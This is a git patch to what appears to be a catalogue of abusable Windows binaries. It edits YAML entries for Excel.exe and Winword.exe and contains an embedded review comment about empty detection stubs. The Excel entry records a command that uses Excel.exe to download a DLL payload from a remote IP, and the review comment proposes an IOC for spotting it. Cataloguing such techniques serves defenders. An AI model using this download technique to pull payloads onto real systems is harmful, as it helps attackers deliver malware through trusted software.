From 32757cd0c3f99518730607350e4d2136e18bad83 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Tue, 17 Sep 2019 22:58:03 +0200
Subject: [PATCH] Added Office binaries from jreegun to the project. Pull request 42
---
 yml/OtherMSBinaries/Excel.yml | 10 +++++++---
 yml/OtherMSBinaries/Winword.yml | 8 ++++++--
 2 files changed, 13 insertions(+), 5 deletions(-)
diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml
index c61df04..6aba87a 100644
--- a/yml/OtherMSBinaries/Excel.yml
+++ b/yml/OtherMSBinaries/Excel.yml
@@ -1,10 +1,10 @@
 ---
 Name: Excel.exe
-Description: Microsoft Office binary.
+Description: Microsoft Office binary
 Author: 'Reegun J (OCBC Bank)'
 Created: '2019-07-19'
 Commands:
- - Command: Excel.exe "http://192.168.1.10/TeamsAddinLoader.dll"
+ - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
 Description: Downloads payload from remote server
 Usecase: It will download a remote payload and place it in the cache folder
 Category: Download
@@ -28,10 +28,14 @@ Full_Path:
 - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
 - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
 - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC:
 Resources:
 - Link: https://twitter.com/reegun21/status/1150032506504151040
 - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
 Acknowledgement:
- - Person: Reegun J (OCBC Bank)
+ - Person: 'Reegun J (OCBC Bank)'
 Handle: '@reegun21'
 ---
\ No newline at end of file
diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml
index 3b3e6fb..b39a89f 100644
--- a/yml/OtherMSBinaries/Winword.yml
+++ b/yml/OtherMSBinaries/Winword.yml
@@ -1,6 +1,6 @@
 ---
 Name: Winword.exe
-Description: Microsoft Office binary.
+Description: Microsoft Office binary
 Author: 'Reegun J (OCBC Bank)'
 Created: '2019-07-19'
 Commands:
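Review bot: The `Detection:` block added in the second Excel.yml hunk has an empty `- IOC:`, and `Code_Sample:` an empty `- Code:`, so both keys parse as null and the entry documents a download technique with no detection guidance for defenders; the second Winword.yml hunk adds the same empty stubs. Either leave the placeholders out until there is content, or fill the IOC from what the entry already states, for example `- IOC: Excel.exe started with an http:// or https:// URL on its command line`, with the Winword.exe equivalent in the other file. The unchanged `Full_Path` context in both hunks also lists the `C:\Program Files\Microsoft Office\Office12\` path twice, which looks like a copy-paste duplicate worth confirming.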
@@ -28,10 +28,14 @@ Full_Path:
 - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
 - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
 - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC:
 Resources:
 - Link: https://twitter.com/reegun21/status/1150032506504151040
 - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
 Acknowledgement:
- - Person: Reegun J (OCBC Bank)
+ - Person: 'Reegun J (OCBC Bank)'
 Handle: '@reegun21'
 ---
\ No newline at end of file